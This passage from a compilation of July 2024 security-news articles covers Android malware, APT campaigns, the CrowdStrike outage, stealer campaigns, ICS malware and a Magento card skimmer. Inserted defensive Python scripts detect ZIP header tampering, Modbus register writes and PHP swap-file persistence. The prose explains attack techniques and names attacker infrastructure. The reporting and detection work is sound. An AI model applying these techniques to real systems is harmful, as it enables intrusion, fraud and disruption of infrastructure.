Users who click on the video are shown a genuine-looking warning message stating that the video cannot be played and urging them to try playing it with an external player. Should they proceed with that step, they are subsequently asked to allow installation of the APK file through Telegram. The app in question is named "xHamster Premium Mod."
"By default, media files received via Telegram are set to download automatically," Štefanko said. "This means that users with the option enabled will automatically download the malicious payload once they open the conversation where it was shared."
While this option can be disabled manually, the payload can still be downloaded by tapping the download button accompanying the supposed video. It's worth noting that the attack does not work on Telegram clients for the web or the dedicated Windows app.
It's currently not clear who is behind the exploit and how widely it was used in real-world attacks. The same actor, however, advertised in January 2024 a fully undetectable Android crypter (aka cryptor) that can reportedly bypass Google Play Protect.
Hamster Kombat's Viral Success Spawns Malicious Copycat
The development comes as cyber criminals are capitalizing on the Telegram-based
cryptocurrency game Hamster Kombat for monetary gain, with ESET discovering fake
app stores promoting the app, GitHub repositories hosting Lumma Stealer for
Windows under the guise of automation tools for the game, and an unofficial
Telegram channel that's used to distribute an Android trojan called Ratel.
The popular game, which launched in March 2024, is estimated to have more than 250 million players, according to the game developer. Telegram CEO Pavel Durov has called Hamster Kombat the "fastest-growing digital service in the world" and that "Hamster's team will mint its token on TON, introducing the benefits of blockchain to hundreds of millions of people."
Ratel, offered via a Telegram channel named "hamster_easy," is designed to
impersonate the game ("Hamster.apk") and prompts users to grant it notification
access and set itself as the default SMS application. It subsequently initiates
contact with a remote server to get a phone number as response.
In the next step, the malware sends a Russian language SMS message to that phone number, likely belonging to the malware operators, to receive additional instructions over SMS.
"The threat actors then become capable of controlling the compromised device via SMS: The operator message can contain a text to be sent to a specified number, or even instruct the device to call the number," ESET said. "The malware is also able to check the victim's current banking account balance for Sberbank Russia by sending a message with the text баланс (translation: balance) to the number 900."
Ratel abuses its notification access permissions to hide notifications from no less than 200 apps based on a hard-coded list embedded within it. It's suspected that this is being done in an attempt to subscribe the victims to various premium services and prevent them from being alerted.
The Slovakian cybersecurity firm said it also spotted fake application storefronts claiming to offer Hamster Kombat for download that actually direct users to unwanted ads, as well as GitHub repositories offering Hamster Kombat automation tools that deploy Lumma Stealer instead.
"The success of Hamster Kombat has also brought out cybercriminals, who have already started to deploy malware targeting the players of the game," Štefanko and Peter Strýček said. "Hamster Kombat's popularity makes it ripe for abuse, which means that it is highly likely that the game will attract more malicious actors in the future."
BadPack Android Malware Slips Through the Cracks
Beyond Telegram, malicious APK files targeting Android devices have also taken the form of BadPack, which refers to specially crafted package files in which the header information used in the ZIP archive format has been altered in an attempt to obstruct static analysis.
In doing so, the idea is to prevent the AndroidManifest.xml file – a crucial file that provides essential information about the mobile application – from being extracted and properly parsed, thereby allowing malicious artifacts to be installed without raising any red flags.
This technique was extensively documented by Kaspersky earlier this April in connection with an Android trojan referred to as SoumniBot that has targeted users in South Korea. Telemetry data gathered by Palo Alto Networks Unit 42 from June 2023 through June 2024 has detected nearly 9,200 BadPack samples in the wild, although none of them have been found on Google Play Store.
"These tampered headers are a key feature of BadPack, and such samples typically pose a challenge for Android reverse engineering tools," Unit 42 researcher Lee Wei Yeong said in a report published last week. "Many Android-based banking Trojans like BianLian, Cerberus and TeaBot use BadPack."
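The header tampering described above can be checked for directly, because a ZIP archive carries two descriptions of every entry: the central directory record and the local file header it points to. The following Python script is an added example, not code from Unit 42 or Kaspersky. It builds a small, constructed APK-like archive, walks the central directory, and compares each record with its local header, reporting any disagreement in filename, compression method or CRC/size fields. The `tamper_local_header` helper exists only to produce a test fixture for the checker; the file names, sample bytes and the set of compression methods treated as expected in an APK are assumptions for this example.

```python
import io
import struct
import zipfile

LOCAL_HDR = struct.Struct("<4sHHHHHIIIHH")           # local file header, 30 bytes
CENTRAL_HDR = struct.Struct("<4sHHHHHHIIIHHHHHII")   # central directory record, 46 bytes
EOCD = struct.Struct("<4sHHHHIIH")                   # end of central directory, 22 bytes
# Assumption for this example: only "stored" (0) and "deflated" (8) are expected in an APK.
EXPECTED_METHODS = {0, 8}


def build_sample_apk() -> bytes:
    """Constructed, well-formed archive carrying the two files every APK has."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"<manifest package='example.constructed'/>" * 4)
        z.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 64)
    return buf.getvalue()


def central_entries(data: bytes):
    """Yield (record_tuple, raw_filename) for each central directory record."""
    eocd_pos = data.rfind(b"PK\x05\x06")
    if eocd_pos < 0:
        raise ValueError("no end-of-central-directory record")
    _sig, _disk, _cd_disk, _n_disk, n_total, _cd_size, cd_off, _clen = EOCD.unpack_from(data, eocd_pos)
    pos = cd_off
    for _ in range(n_total):
        rec = CENTRAL_HDR.unpack_from(data, pos)
        fn_len, extra_len, comment_len = rec[10], rec[11], rec[12]
        name = data[pos + CENTRAL_HDR.size:pos + CENTRAL_HDR.size + fn_len]
        yield rec, name
        pos += CENTRAL_HDR.size + fn_len + extra_len + comment_len


def find_header_tampering(data: bytes) -> list:
    """Compare every central directory record with the local header it points to.

    Returns human-readable findings; an empty list means both views agree and
    only expected compression methods are used.
    """
    findings = []
    for rec, name in central_entries(data):
        c_method, c_crc, c_csize, c_usize, offset = rec[4], rec[7], rec[8], rec[9], rec[16]
        (l_sig, _ver, l_flags, l_method, _t, _d, l_crc, l_csize, l_usize,
         l_fnlen, _l_extra) = LOCAL_HDR.unpack_from(data, offset)
        label = name.decode("utf-8", "replace")
        if l_sig != b"PK\x03\x04":
            findings.append(f"{label}: no local file header at offset {offset}")
            continue
        if data[offset + LOCAL_HDR.size:offset + LOCAL_HDR.size + l_fnlen] != name:
            findings.append(f"{label}: local filename differs from central directory")
        if l_method != c_method:
            findings.append(f"{label}: compression method {l_method} (local) != {c_method} (central)")
        if not EXPECTED_METHODS >= {l_method, c_method}:
            findings.append(f"{label}: unexpected compression method")
        # With the data-descriptor flag (bit 3) set, zero sizes/CRC in the local header are legitimate.
        if not (l_flags & 0x08) and (l_crc, l_csize, l_usize) != (c_crc, c_csize, c_usize):
            findings.append(f"{label}: CRC/size fields disagree between headers")
    return findings


def tamper_local_header(data: bytes, target: str) -> bytes:
    """Test fixture only: corrupt one local header's method and size fields."""
    out = bytearray(data)
    for rec, name in central_entries(data):
        if name == target.encode():
            offset = rec[16]
            struct.pack_into("<H", out, offset + 8, 0x1337)   # compression method field
            struct.pack_into("<I", out, offset + 22, 0)       # uncompressed size field
            return bytes(out)
    raise KeyError(target)


if __name__ == "__main__":
    clean = build_sample_apk()
    print("clean:", find_header_tampering(clean))
    print("tampered:", find_header_tampering(tamper_local_header(clean, "AndroidManifest.xml")))
```

Different parsers trust different headers, so a disagreement between the two views is itself the indicator worth alerting on; the checker reports and does not attempt to repair the archive, which keeps it safe to run over untrusted samples.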
Update
In a statement shared with The Hacker News, Telegram said the exploit is not a vulnerability in the platform and it deployed a server-side fix on July 9, 2024, to secure users.
"It would have required users to open the video, adjust Android safety settings and then manually install a suspicious-looking 'media app,'" the company said, emphasizing that the exploit only poses a security risk when users install the app after bypassing the security feature.
Google said Android users are automatically secured against trojans via Google Play Protect, which is enabled by default on all devices with Google Play Services. "Google Play Protect can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play," it said.
Patchwork Hackers Target Bhutan with Advanced Brute Ratel C4 Tool
25.7.24
Hacking The Hacker News
The threat actor known as Patchwork has been linked to a cyber attack targeting entities with ties to Bhutan to deliver the Brute Ratel C4 framework and an updated version of a backdoor called PGoShell.
The development marks the first time the adversary has been observed using the red teaming software, the Knownsec 404 Team said in an analysis published last week.
The activity cluster, also called APT-C-09, Dropping Elephant, Operation Hangover, Viceroy Tiger, and Zinc Emerson, is a state-sponsored actor likely of Indian origin.
Known for conducting spear-phishing and watering hole attacks against China and Pakistan, the hacking crew is believed to be active since at least 2009, according to data shared by Chinese cybersecurity firm QiAnXin.
Last July, Knownsec 404 disclosed details of an espionage campaign aimed at universities and research organizations in China that leveraged a .NET-based implant codenamed EyeShell to fetch and execute commands from an attacker-controlled server, run additional payloads, and capture screenshots.
Then earlier this February, it was found that the threat actor had employed romance-themed lures to ensnare victims in Pakistan and India and compromise their Android devices with a remote access trojan dubbed VajraSpy.
The starting point of the latest observed attack chain is a Windows shortcut (LNK) file that's designed to download a decoy PDF document from a remote domain impersonating the UNFCCC-backed Adaptation Fund, while stealthily deploying Brute Ratel C4 and PGoShell retrieved from a different domain ("beijingtv[.]org").
"PGoShell is developed in the Go programming language; overall, it offers a rich set of functionalities, including remote shell capabilities, screen capture, and downloading and executing payloads," the cybersecurity company said.
The development comes months after APT-K-47 – another threat actor sharing tactical overlaps with SideWinder, Patchwork, Confucius, and Bitter – was attributed to attacks involving the use of ORPCBackdoor as well as previously undocumented malware like WalkerShell, DemoTrySpy, and NixBackdoor to harvest data and execute shellcode.
The attacks are also notable for deploying an open-source command-and-control (C2) framework known as Nimbo-C2, which "enables a wide range of remote control functionalities," Knownsec 404 said.
CrowdStrike Explains Friday Incident Crashing Millions of Windows Devices
25.7.24
Security The Hacker News
Cybersecurity firm CrowdStrike on Wednesday blamed an issue in its validation system for causing millions of Windows devices to crash as part of a widespread outage late last week.
"On Friday, July 19, 2024 at 04:09 UTC, as part of regular operations, CrowdStrike released a content configuration update for the Windows sensor to gather telemetry on possible novel threat techniques," the company said in its Preliminary Post Incident Review (PIR).
"These updates are a regular part of the dynamic protection mechanisms of the Falcon platform. The problematic Rapid Response Content configuration update resulted in a Windows system crash."
The incident impacted Windows hosts running sensor version 7.11 and above that were online between July 19, 2024, 04:09 UTC and 05:27 UTC and received the update. Apple macOS and Linux systems were not affected.
CrowdStrike said it delivers security content configuration updates in two ways, one via Sensor Content that's shipped with Falcon Sensor and another through Rapid Response Content that allows it to flag novel threats using various behavioral pattern-matching techniques.
The crash is said to have been the result of a Rapid Response Content update containing a previously undetected error. It's worth noting that such updates are delivered in the form of Template Instances corresponding to specific behaviors – each of which is mapped to a unique Template Type – for enabling new telemetry and detection.
The Template Instances, in turn, are created using a Content Configuration System, after which they are deployed to the sensor over the cloud through a mechanism dubbed Channel Files, which are ultimately written to disk on the Windows machine. The system also encompasses a Content Validator component that carries out validation checks on the content before it is published.
"Rapid Response Content provides visibility and detections on the sensor without requiring sensor code changes," it explained.
"This capability is used by threat detection engineers to gather telemetry, identify indicators of adversary behavior and perform detections and preventions. Rapid Response Content is behavioral heuristics, separate and distinct from CrowdStrike's on-sensor AI prevention and detection capabilities."
These updates are then parsed by the Falcon sensor's Content Interpreter, which then allows the Sensor Detection Engine to detect or prevent malicious activity, depending on the customer's policy configuration.
While each new Template Type is stress tested for different parameters like resource utilization and performance impact, the root cause of the problem, per CrowdStrike, could be traced back to the rollout of the Interprocess Communication (IPC) Template Type on February 28, 2024, that was introduced to flag attacks that abuse named pipes.
The timeline of events is as follows -
February 28, 2024 - CrowdStrike releases sensor 7.11 to customers with new IPC Template Type
March 5, 2024 - The IPC Template Type passes the stress test and is validated for use
March 5, 2024 - The IPC Template Instance is released to production via Channel File 291
April 8 - 24, 2024 - Three more IPC Template Instances are deployed in production
July 19, 2024 - Two additional IPC Template Instances are deployed, one of which passes validation despite having problematic content data
"Based on the testing performed before the initial deployment of the Template Type (on March 05, 2024), trust in the checks performed in the Content Validator, and previous successful IPC Template Instance deployments, these instances were deployed into production," CrowdStrike said.
"When received by the sensor and loaded into the Content Interpreter, problematic content in Channel File 291 resulted in an out-of-bounds memory read triggering an exception. This unexpected exception could not be gracefully handled, resulting in a Windows operating system crash (BSoD)."
In response to the sweeping disruptions caused by the crash, and to prevent them from happening again, the Texas-based company said it has improved its testing processes and enhanced the error handling mechanism in the Content Interpreter. It's also planning to implement a staggered deployment strategy for Rapid Response Content.
Microsoft Defender Flaw Exploited to Deliver ACR, Lumma, and Meduza Stealers
25.7.24
Exploit The Hacker News
A now-patched security flaw in the Microsoft Defender SmartScreen has been exploited as part of a new campaign designed to deliver information stealers such as ACR Stealer, Lumma, and Meduza.
Fortinet FortiGuard Labs said it detected the stealer campaign targeting Spain, Thailand, and the U.S. using booby-trapped files that exploit CVE-2024-21412 (CVSS score: 8.1).
The high-severity vulnerability allows an attacker to sidestep SmartScreen protection and drop malicious payloads. Microsoft addressed this issue as part of its monthly security updates released in February 2024.
"Initially, attackers lure victims into clicking a crafted link to a URL file designed to download an LNK file," security researcher Cara Lin said. "The LNK file then downloads an executable file containing an [HTML Application] script."
The HTA file serves as a conduit to decode and decrypt PowerShell code responsible for fetching a decoy PDF file and a shellcode injector that, in turn, either leads to the deployment of Meduza Stealer or Hijack Loader, which subsequently launches ACR Stealer or Lumma.
ACR Stealer, assessed to be an evolved version of the GrMsk Stealer, was advertised in late March 2024 by a threat actor named SheldIO on the Russian-language underground forum RAMP.
"This ACR stealer hides its [command-and-control] with a dead drop resolver (DDR) technique on the Steam community website," Lin said, calling out its ability to siphon information from web browsers, crypto wallets, messaging apps, FTP clients, email clients, VPN services, and password managers.
It's worth noting that recent Lumma Stealer attacks have also been observed utilizing the same technique, making it easier for the adversaries to change the C2 domains at any time and render the infrastructure more resilient, according to the AhnLab Security Intelligence Center (ASEC).
The disclosure comes as CrowdStrike has revealed that threat actors are leveraging last week's outage to distribute a previously undocumented information stealer called Daolpu, making it the latest example of the ongoing fallout stemming from the faulty update that has crippled millions of Windows devices.
The attack involves the use of a macro-laced Microsoft Word document that masquerades as a Microsoft recovery manual listing legitimate instructions issued by the Windows maker to resolve the issue, leveraging it as a decoy to activate the infection process.
The DOCM file, when opened, runs the macro to retrieve a second-stage DLL file from a remote server that's decoded to launch Daolpu, a stealer malware equipped to harvest credentials and cookies from Google Chrome, Microsoft Edge, Mozilla Firefox, and other Chromium-based browsers.
It also follows the emergence of new stealer malware families such as Braodo and DeerStealer, even as cyber criminals are exploiting malvertising techniques promoting legitimate software such as Microsoft Teams to deploy Atomic Stealer.
"As cyber criminals ramp up their distribution campaigns, it becomes more dangerous to download applications via search engines," Malwarebytes researcher Jérôme Segura said. "Users have to navigate between malvertising (sponsored results) and SEO poisoning (compromised websites)."
CISA Adds Twilio Authy and IE Flaws to Exploited Vulnerabilities List
25.7.24
BigBrothers The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two security flaws to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.
The vulnerabilities are listed below -
CVE-2012-4792 (CVSS score: 9.3) - Microsoft Internet Explorer Use-After-Free Vulnerability
CVE-2024-39891 (CVSS score: 5.3) - Twilio Authy Information Disclosure Vulnerability
CVE-2012-4792 is a decade-old use-after-free vulnerability in Internet Explorer that could allow a remote attacker to execute arbitrary code via a specially crafted site.
It's currently not clear if the flaw has been subjected to renewed exploitation attempts, although it was abused as part of watering hole attacks targeting the Council on Foreign Relations (CFR) and Capstone Turbine Corporation websites back in December 2012.
On the other hand, CVE-2024-39891 refers to an information disclosure bug in an unauthenticated endpoint that could be exploited to "accept a request containing a phone number and respond with information about whether the phone number was registered with Authy."
Earlier this month, Twilio said it resolved the issue in versions 25.1.0 (Android) and 26.1.0 (iOS) after unidentified threat actors took advantage of the shortcoming to identify data associated with Authy accounts.
"These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise," CISA said in an advisory.
Federal Civilian Executive Branch (FCEB) agencies are required to remediate the identified vulnerabilities by August 13, 2024, to protect their networks against active threats.
Chinese Hackers Target Taiwan and US NGO with MgBot Malware
24.7.24
Virus The Hacker News
Organizations in Taiwan and a U.S. non-governmental organization (NGO) based in China have been targeted by a Beijing-affiliated state-sponsored hacking group called Daggerfly using an upgraded set of malware tools.
The campaign is a sign that the group "also engages in internal espionage," Symantec's Threat Hunter Team, part of Broadcom, said in a new report published today. "In the attack on this organization, the attackers exploited a vulnerability in an Apache HTTP server to deliver their MgBot malware."
Daggerfly, also known by the names Bronze Highland and Evasive Panda, was previously observed using the MgBot modular malware framework in connection with an intelligence-gathering mission aimed at telecom service providers in Africa. It's known to be operational since 2012.
"Daggerfly appears to be capable of responding to exposure by quickly updating its toolset to continue its espionage activities with minimal disruption," the company noted.
The latest set of attacks are characterized by the use of a new malware family based on MgBot as well as an improved version of a known Apple macOS malware called MACMA, which was first exposed by Google's Threat Analysis Group (TAG) in November 2021 as distributed via watering hole attacks targeting internet users in Hong Kong by abusing security flaws in the Safari browser.
The development marks the first time the malware strain, which is capable of harvesting sensitive information and executing arbitrary commands, has been explicitly linked to a particular hacking group.
"The actors behind macOS.MACMA at least were reusing code from ELF/Android developers and possibly could have also been targeting Android phones with malware as well," SentinelOne noted in a subsequent analysis at the time.
MACMA's connections to Daggerfly also stem from source code overlaps between the malware and MgBot, and the fact that it connects to a command-and-control (C2) server (103.243.212[.]98) that has also been used by a MgBot dropper.
Another new malware in its arsenal is Nightdoor (aka NetMM and Suzafk), an implant that uses Google Drive API for C2 and has been utilized in watering hole attacks aimed at Tibetan users since at least September 2023. Details of the activity were first documented by ESET earlier this March.
"The group can create versions of its tools targeting most major operating system platform," Symantec said, adding it has "seen evidence of the ability to trojanize Android APKs, SMS interception tools, DNS request interception tools, and even malware families targeting Solaris OS."
The development comes as China's National Computer Virus Emergency Response Center (CVERC) claimed Volt Typhoon – which has been attributed by the Five Eyes nations as a China-nexus espionage group – to be an invention of the U.S. intelligence agencies, describing it as a misinformation campaign.
"Although its main targets are U.S. congress and American people, it also attempt[s] to defame China, sow discords [sic] between China and other countries, contain China's development, and rob Chinese companies," the CVERC asserted in a recent report.
New ICS Malware 'FrostyGoop' Targeting Critical Infrastructure
24.7.24
ICS The Hacker News
Cybersecurity researchers have discovered what they say is the ninth Industrial Control Systems (ICS)-focused malware that has been used in a disruptive cyber attack targeting an energy company in the Ukrainian city of Lviv earlier this January.
Industrial cybersecurity firm Dragos has dubbed the malware FrostyGoop, describing it as the first malware strain to directly use Modbus TCP communications to sabotage operational technology (OT) networks. It was discovered by the company in April 2024.
"FrostyGoop is an ICS-specific malware written in Golang that can interact directly with Industrial Control Systems (ICS) using Modbus TCP over port 502," researchers Kyle O'Meara, Magpie (Mark) Graham, and Carolyn Ahlers said in a technical report shared with The Hacker News.
It's believed that the malware, mainly designed to target Windows systems, has been used to target ENCO controllers with TCP port 502 exposed to the internet. It has not been tied to any previously identified threat actor or activity cluster.
FrostyGoop comes with capabilities to read and write to an ICS device holding registers containing inputs, outputs, and configuration data. It also accepts optional command line execution arguments, uses JSON-formatted configuration files to specify target IP addresses and Modbus commands, and logs output to a console and/or a JSON file.
The incident targeting the municipal district energy company is said to have resulted in a loss of heating services to more than 600 apartment buildings for almost 48 hours.
"The adversaries sent Modbus commands to ENCO controllers, causing inaccurate measurements and system malfunctions," the researchers said in a conference call, noting initial access was likely gained by exploiting a vulnerability in Mikrotik routers in April 2023.
"Remediation took almost two days," the researchers added.
While FrostyGoop extensively employs the Modbus protocol for client/server communications, it's far from the only one. In 2022, Dragos and Mandiant detailed another ICS malware named PIPEDREAM (aka INCONTROLLER) that leveraged various industrial network protocols such as OPC UA, Modbus, and CODESYS for interaction.
It's also the ninth ICS-focused malware after Stuxnet, Havex, Industroyer (aka CrashOverride), Triton (aka Trisis), BlackEnergy2, Industroyer2, and COSMICENERGY.
The malware's ability to read or modify data on ICS devices using Modbus has severe consequences for industrial operations and public safety, Dragos said, adding more than 46,000 internet-exposed ICS appliances communicate over the widely-used protocol.
"The specific targeting of ICS using Modbus TCP over port 502 and the potential to interact directly with various ICS devices pose a serious threat to critical infrastructure across multiple sectors," the researchers said.
"Organizations must prioritize the implementation of comprehensive cybersecurity frameworks to safeguard critical infrastructure from similar threats in the future."
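Because FrostyGoop's effect comes from ordinary Modbus/TCP requests rather than an exploit, a network sensor can surface the activity by decoding frames to port 502 and flagging state-changing function codes from hosts that are not expected to write to controllers. The following Python is an added example, not Dragos's code: it parses the MBAP header and PDU, tags the write function codes (single/multiple register and coil writes), and raises alerts both for writes from outside an allowlist and for malformed frames. The packet tuples, IP addresses and allowlist are constructed for the demonstration.

```python
import struct

MBAP = struct.Struct(">HHHB")  # transaction id, protocol id (0 = Modbus), length, unit id
MODBUS_PORT = 502

# Function codes that change device state; 0x01-0x04 are reads and are left unflagged.
WRITE_FUNCTIONS = {
    0x05: "Write Single Coil",
    0x06: "Write Single Register",
    0x0F: "Write Multiple Coils",
    0x10: "Write Multiple Registers",
    0x16: "Mask Write Register",
    0x17: "Read/Write Multiple Registers",
}


def parse_modbus_tcp(payload: bytes) -> dict:
    """Decode one Modbus/TCP ADU (MBAP header plus PDU); ValueError on malformed input."""
    if len(payload) < MBAP.size + 1:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, proto, length, unit = MBAP.unpack_from(payload, 0)
    if proto != 0:
        raise ValueError(f"protocol id {proto} is not Modbus")
    pdu = payload[MBAP.size:]
    if len(pdu) != length - 1:  # the length field counts the unit id and the PDU
        raise ValueError(f"length field {length} does not match frame of {len(payload)} bytes")
    func = pdu[0]
    frame = {"tid": tid, "unit": unit, "function": func, "write": func in WRITE_FUNCTIONS}
    if func in (0x05, 0x06) and len(pdu) >= 5:
        frame["address"], frame["value"] = struct.unpack_from(">HH", pdu, 1)
    elif func in (0x0F, 0x10) and len(pdu) >= 6:
        frame["address"], frame["quantity"], frame["byte_count"] = struct.unpack_from(">HHB", pdu, 1)
    elif func in (0x01, 0x02, 0x03, 0x04) and len(pdu) >= 5:
        frame["address"], frame["quantity"] = struct.unpack_from(">HH", pdu, 1)
    return frame


def flag_unauthorized_writes(packets, allowed_writers):
    """packets: iterable of (src_ip, dst_ip, dst_port, payload). Returns a list of alerts."""
    alerts = []
    for src, dst, dport, payload in packets:
        if dport != MODBUS_PORT:
            continue
        try:
            frame = parse_modbus_tcp(payload)
        except ValueError as exc:
            alerts.append({"src": src, "dst": dst, "reason": f"malformed Modbus frame: {exc}"})
            continue
        if frame["write"] and src not in allowed_writers:
            alerts.append({"src": src, "dst": dst,
                           "reason": f"{WRITE_FUNCTIONS[frame['function']]} from unapproved host",
                           "frame": frame})
    return alerts


# Constructed traffic: an engineering workstation (10.0.0.5) talks to a controller (10.0.1.20),
# then an unknown host sends the same kind of writes plus a truncated frame.
SAMPLE_PACKETS = [
    ("10.0.0.5", "10.0.1.20", 502, bytes.fromhex("000100000006010300000002")),               # read 2 holding regs
    ("10.0.0.5", "10.0.1.20", 502, bytes.fromhex("00020000000601060010002A")),               # write reg 0x10 := 42
    ("203.0.113.7", "10.0.1.20", 502, bytes.fromhex("00030000000601060010002A")),            # same write, unknown host
    ("203.0.113.7", "10.0.1.20", 502, bytes.fromhex("00040000000B0110001000020400010002")),  # write 2 regs
    ("203.0.113.7", "10.0.1.20", 502, bytes.fromhex("0005000000060103")),                    # truncated frame
    ("203.0.113.7", "10.0.1.20", 80, b"GET / HTTP/1.0\r\n\r\n"),                             # not Modbus, ignored
]
ALLOWED_WRITERS = {"10.0.0.5"}


def run_demo():
    return flag_unauthorized_writes(SAMPLE_PACKETS, ALLOWED_WRITERS)


if __name__ == "__main__":
    for alert in run_demo():
        print(alert["src"], "->", alert["dst"], alert["reason"])
```

Modbus has no authentication, so the source allowlist is the only thing distinguishing an operator's write from an intruder's; in practice the list is derived from a baseline of which hosts normally issue writes, and the malformed-frame alert catches scanners and tooling that do not speak the protocol cleanly.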
Magento Sites Targeted with Sneaky Credit Card Skimmer via Swap Files
24.7.24
Crime The Hacker News
Threat actors have been observed using swap files in compromised websites to conceal a persistent credit card skimmer and harvest payment information.
The sneaky technique, observed by Sucuri on a Magento e-commerce site's checkout page, allowed the malware to survive multiple cleanup attempts, the company said.
The skimmer is designed to capture all the data entered into the credit card form on the website and exfiltrate the details to an attacker-controlled domain named "amazon-analytic[.]com," which was registered in February 2024.
"Note the use of the brand name; this tactic of leveraging popular products and services in domain names is often used by bad actors in an attempt to evade detection," security researcher Matt Morrow said.
This is just one of many defense evasion methods employed by the threat actor, which also includes the use of swap files ("bootstrap.php-swapme") to load the malicious code while keeping the original file ("bootstrap.php") intact and free of malware.
"When files are edited directly via SSH the server will create a temporary 'swap' version in case the editor crashes, which prevents the entire contents from being lost," Morrow explained.
"It became evident that the attackers were leveraging a swap file to keep the malware present on the server and evade normal methods of detection."
Although it's currently not clear how the initial access was obtained in this case, it's suspected to have involved the use of SSH or some other terminal session.
The disclosure arrives as compromised administrator user accounts on WordPress sites are being used to install a malicious plugin that masquerades as the legitimate Wordfence plugin, but comes with capabilities to create rogue admin users and disable Wordfence while giving a false impression that everything is working as expected.
"In order for the malicious plugin to have been placed on the website in the first place, the website would have already had to have been compromised — but this malware could definitely serve as a reinfection vector," security researcher Ben Martin said.
"The malicious code only works on pages of WordPress admin interface whose URL contains the word 'Wordfence' in them (Wordfence plugin configuration pages)."
Site owners are advised to restrict the use of common protocols like FTP, sFTP, and SSH to trusted IP addresses, as well as ensure that the content management systems and plugins are up-to-date.
Users are also recommended to enable two-factor authentication (2FA), use a firewall to block bots, and enforce additional wp-config.php security implementations such as DISALLOW_FILE_EDIT and DISALLOW_FILE_MODS.
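A defender can hunt for the persistence trick Sucuri describes by looking for swap-style siblings of PHP files and for PHP sources that reference them, since a clean original next to a loaded swap copy is exactly what cleanup tools miss. The Python scanner below is an added example, not Sucuri's tooling: it walks a web root, matches vim-style `.name.php.swp`, `name.php~` and the `-swapme` suffix quoted above, and reports whether the original still exists and which PHP files mention the swap file by name. The fixture directory it builds is constructed for the demonstration and is not Magento code.

```python
import os
import re
import tempfile

# Name shapes that mark an editor swap or backup copy sitting next to a PHP file:
# vim writes ".name.php.swp" (and .swo, .swn, ...), many editors write "name.php~",
# and "name.php-swapme" is the suffix seen in the Sucuri case above.
SWAP_PATTERNS = [
    re.compile(r"^\.(?P<base>.+\.php)\.sw[a-p]$"),
    re.compile(r"^(?P<base>.+\.php)~$"),
    re.compile(r"^(?P<base>.+\.php)-swapme$"),
]


def swap_base(filename: str):
    """Return the PHP filename a swap-style name shadows, or None if it is not one."""
    for pattern in SWAP_PATTERNS:
        match = pattern.match(filename)
        if match:
            return match.group("base")
    return None


def scan_webroot(root: str) -> list:
    """One finding per swap-style file: its path, whether the original still exists,
    and every PHP file under root whose source mentions the swap file's name."""
    swaps, php_files = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            base = swap_base(name)
            if base:
                swaps.append((path, os.path.join(dirpath, base), name))
            elif name.endswith(".php"):
                php_files.append(path)
    findings = []
    for path, original, name in swaps:
        referenced_by = []
        for php in php_files:
            with open(php, "rb") as fh:
                if name.encode() in fh.read():
                    referenced_by.append(os.path.relpath(php, root))
        findings.append({
            "swap_file": os.path.relpath(path, root),
            "original_exists": os.path.exists(original),
            "referenced_by": sorted(referenced_by),
        })
    return findings


def build_fixture() -> str:
    """Constructed web root mimicking the case above; the contents are placeholders."""
    root = tempfile.mkdtemp(prefix="webroot-")
    app = os.path.join(root, "app")
    os.makedirs(app)
    with open(os.path.join(app, "bootstrap.php"), "w") as fh:
        fh.write("<?php // clean original, untouched\n")
    with open(os.path.join(app, "bootstrap.php-swapme"), "w") as fh:
        fh.write("<?php // constructed stand-in for injected code\n")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php require __DIR__ . '/app/bootstrap.php-swapme';\n")
    return root


if __name__ == "__main__":
    for finding in scan_webroot(build_fixture()):
        print(finding)
```

A swap file whose original is intact and which is referenced from another PHP file is the signature of this technique; a stray `.swp` with no references is usually just an interrupted edit, so the `referenced_by` list is what separates the two.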
Meta Given Deadline to Address E.U. Concerns Over 'Pay or Consent' Model
24.7.24
Social The Hacker News
Meta has been given time till September 1, 2024, to respond to concerns raised by the European Commission over its "pay or consent" advertising model or risk facing enforcement measures, including sanctions.
The European Commission said the Consumer Protection Cooperation (CPC) Network has notified the social media giant that the model adopted for Facebook and Instagram might potentially violate consumer protection laws.
It described the new practice as misleading and confusing, with authorities expressing worries that consumers might have been pressured into choosing quickly between either paying for a monthly subscription or consenting to their personal data being used for targeted advertising.
This, the agency said, could have been motivated by fears that they "would instantly lose access to their accounts and their network of contacts."
Meta, which introduced a subscription plan for European Union (E.U.) users in late 2023, has run into hot water over offering what's essentially not a choice at all and for extracting a "privacy fee" to exercise their data protection rights.
As per the E.U. Digital Markets Act (DMA), companies in gatekeeper roles are required to seek users' express consent before utilizing their data for offering services that go beyond their core functionality (e.g., advertising) or provide access to a less personalized but equivalent version of the platforms for those who refuse to opt in.
"Gatekeepers cannot make use of the service or certain functionalities conditional on users' consent," the Commission noted earlier this month, stating that Meta's model is in violation of the DMA.
The Commission further called out Meta for using vague terms and branding the service as "free" when, in reality, it forces consumers to agree to their data used for personalized ads, not to mention making the experience confusing by making them "navigate through different screens" to determine how their data is used and processed for advertising purposes.
Meta, however, considers the paid version a legitimate business model, and has pointed to a ruling from the Court of Justice of the European Union (CJEU) last July that a company may offer an equivalent alternative version of its service "for an appropriate fee" that does not rely on data collection for ads.
That said, it bears noting here that the judgment pertains to users signing up for Meta's services, and not to existing users (which is where the aforementioned issues associated with changes to the consent model come from). It remains to be seen if it can be interpreted as a legal precedent.
"Consumers must not be lured into believing that they would either pay and not be shown any ads anymore, or receive a service for free, when, instead, they would agree that the company used their personal data to make revenue with ads," Didier Reynders, E.U. Commissioner for Justice, said.
"Traders must inform consumers upfront and in a fully transparent manner on how they use their personal data. This is a fundamental right that we will protect."
The development comes days after Nigeria's Federal Competition and Consumer Protection Commission (FCCPC) fined Meta $220 million after an investigation showed that the company's data sharing on Facebook and WhatsApp violated local consumer, data protection, and privacy laws by collecting users' information without their consent.
"Meta Parties shall immediately and forthwith stop the process of sharing WhatsApp user's information with other Facebook companies and third parties, until such a time when users have actively and voluntarily consented to each and every component of the liberties Meta parties intend to exercise with respect to the information of the data subjects," a final order issued last week read.
